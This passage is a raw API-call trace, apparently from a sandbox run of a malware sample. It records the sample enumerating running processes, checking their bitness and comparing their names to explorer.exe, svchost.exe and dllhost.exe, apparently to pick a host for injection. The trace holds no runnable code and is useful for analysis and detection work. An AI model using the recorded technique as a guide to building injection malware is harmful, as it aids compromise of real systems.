cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0234.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0234.357] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.357] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.357] CloseHandle (hObject=0xec) returned 1 [0234.357] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0234.357] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0234.357] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0234.357] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0234.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0234.357] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.357] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.358] CloseHandle (hObject=0xec) returned 1 [0234.358] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0234.358] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0234.358] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0234.358] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0234.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0234.358] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.358] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.358] CloseHandle (hObject=0xec) returned 1 [0234.358] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0234.358] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0234.358] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0234.358] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0234.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0234.359] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.359] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.359] CloseHandle (hObject=0xec) returned 1 [0234.359] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0234.359] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0234.359] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0234.359] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0234.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0234.360] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.360] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.360] CloseHandle (hObject=0xec) returned 1 [0234.360] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0234.360] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0234.360] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0234.360] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0234.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0234.360] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.360] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.360] CloseHandle (hObject=0xec) returned 1 [0234.360] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0234.360] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0234.360] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0234.361] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0234.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0234.361] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0234.361] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0234.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0234.362] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0234.363] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0234.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0234.363] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0234.363] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.364] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.364] CloseHandle (hObject=0xec) returned 1 [0234.364] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0234.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0234.364] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.364] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.364] CloseHandle (hObject=0xec) returned 1 [0234.364] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0234.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0234.365] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0234.365] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.365] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.365] CloseHandle (hObject=0xec) returned 1 [0234.365] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0234.365] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0234.368] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.368] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.368] CloseHandle (hObject=0xec) returned 1 [0234.368] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.368] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0234.369] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.369] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.369] CloseHandle (hObject=0xec) returned 1 [0234.369] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0234.370] CloseHandle (hObject=0xe8) returned 1 [0234.370] Sleep (dwMilliseconds=0x3e8) [0235.382] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0235.383] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0235.384] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0235.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0235.384] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0235.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0235.385] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0235.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0235.385] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0235.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0235.386] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0235.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0235.386] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0235.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0235.387] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0235.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0235.387] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0235.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0235.388] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0235.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0235.388] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0235.389] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0235.389] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0235.390] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0235.390] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0235.391] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0235.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0235.391] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0235.392] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0235.392] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0235.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0235.393] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.393] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.393] CloseHandle (hObject=0xec) returned 1 [0235.393] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0235.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0235.393] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0235.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0235.394] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.394] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.394] CloseHandle (hObject=0xec) returned 1 [0235.394] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0235.395] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0235.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0235.395] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0235.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0235.396] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.396] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.396] CloseHandle (hObject=0xec) returned 1 [0235.396] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0235.396] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0235.396] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0235.396] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0235.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0235.396] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.396] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.396] CloseHandle (hObject=0xec) returned 1 [0235.396] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0235.396] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0235.396] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0235.396] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0235.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0235.397] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.397] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.397] CloseHandle (hObject=0xec) returned 1 [0235.397] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0235.397] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0235.397] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0235.397] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0235.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0235.398] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.398] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.398] CloseHandle (hObject=0xec) returned 1 [0235.398] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0235.398] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0235.398] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0235.398] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0235.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0235.398] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0235.398] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) 